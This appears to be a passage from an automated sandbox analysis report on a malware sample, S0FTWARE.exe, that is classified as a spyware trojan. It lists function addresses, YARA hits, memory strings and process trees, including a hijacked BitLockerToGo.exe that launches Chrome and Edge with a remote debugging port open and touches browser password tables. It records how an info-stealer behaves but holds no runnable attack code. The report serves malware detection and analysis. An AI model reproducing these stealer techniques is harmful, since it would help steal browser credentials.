                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C98D9603_2_6C98D960
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9EBA903_2_6C9EBA90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C98CAB03_2_6C98CAB0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9E2AB03_2_6C9E2AB0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9722A03_2_6C9722A0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9A4AA03_2_6C9A4AA0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B8AC03_2_6C9B8AC0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C991AF03_2_6C991AF0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9BE2F03_2_6C9BE2F0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B9A603_2_6C9B9A60
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C97F3803_2_6C97F380
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9E53C83_2_6C9E53C8
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9BD3203_2_6C9BD320
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9753403_2_6C975340
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C98C3703_2_6C98C370
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CA1ECC03_2_6CA1ECC0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CA7ECD03_2_6CA7ECD0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CAFAC303_2_6CAFAC30
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CAE6C003_2_6CAE6C00
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CA2AC603_2_6CA2AC60
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CA24DB03_2_6CA24DB0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CAB6D903_2_6CAB6D90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CBACDC03_2_6CBACDC0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CBA8D203_2_6CBA8D20
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CAEED703_2_6CAEED70
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CB4AD503_2_6CB4AD50
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CAA6E903_2_6CAA6E90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CA2AEC03_2_6CA2AEC0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CAC0EC03_2_6CAC0EC0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CB00E203_2_6CB00E20
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 008E470C appears 287 times
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C9B94D0 appears 90 times
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C9ACBE8 appears 134 times
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 008F2143 appears 34 times
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 008F2265 appears 73 times
                          Source: S0FTWARE.exe, 00000000.00000000.1414514665.0000000001002000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs S0FTWARE.exe
                          Source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs S0FTWARE.exe
                          Source: S0FTWARE.exeBinary or memory string: OriginalFileName vs S0FTWARE.exe
                          Source: S0FTWARE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                          Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                          Source: 00000000.00000003.1596858257.0000000011A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@64/255@22/19
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6C9D7030
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F3101 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_008F3101
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F33B3 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z,__EH_prolog3_catch,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,3_2_008F33B3
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\MFXHI3G9.htmJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: S0FTWARE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\S0FTWARE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: BitLockerToGo.exe, 00000003.00000003.2180360912.000000000320B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2378708448.000000000322A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2376930526.000000000322A000.00000004.00000020.00020000.00000000.sdmp, IECGIEBAE.3.dr, HJJEGCAAE.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: S0FTWARE.exeReversingLabs: Detection: 57%
                          Source: S0FTWARE.exeString found in binary or memory: github.com/saferwall/pe@v1.5.5/loadconfig.go
                          Source: unknownProcess created: C:\Users\user\Desktop\S0FTWARE.exe "C:\Users\user\Desktop\S0FTWARE.exe"
                          Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2268,i,3846380570938654004,26334187060056597,262144 /prefetch:8
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2320,i,9641244863575168474,7710836502246451740,262144 /prefetch:3
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3052 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7088 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5220 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8
                          Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2268,i,3846380570938654004,26334187060056597,262144 /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2320,i,9641244863575168474,7710836502246451740,262144 /prefetch:3Jump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3052 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:3Jump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7088 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8Jump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5220 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8Jump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
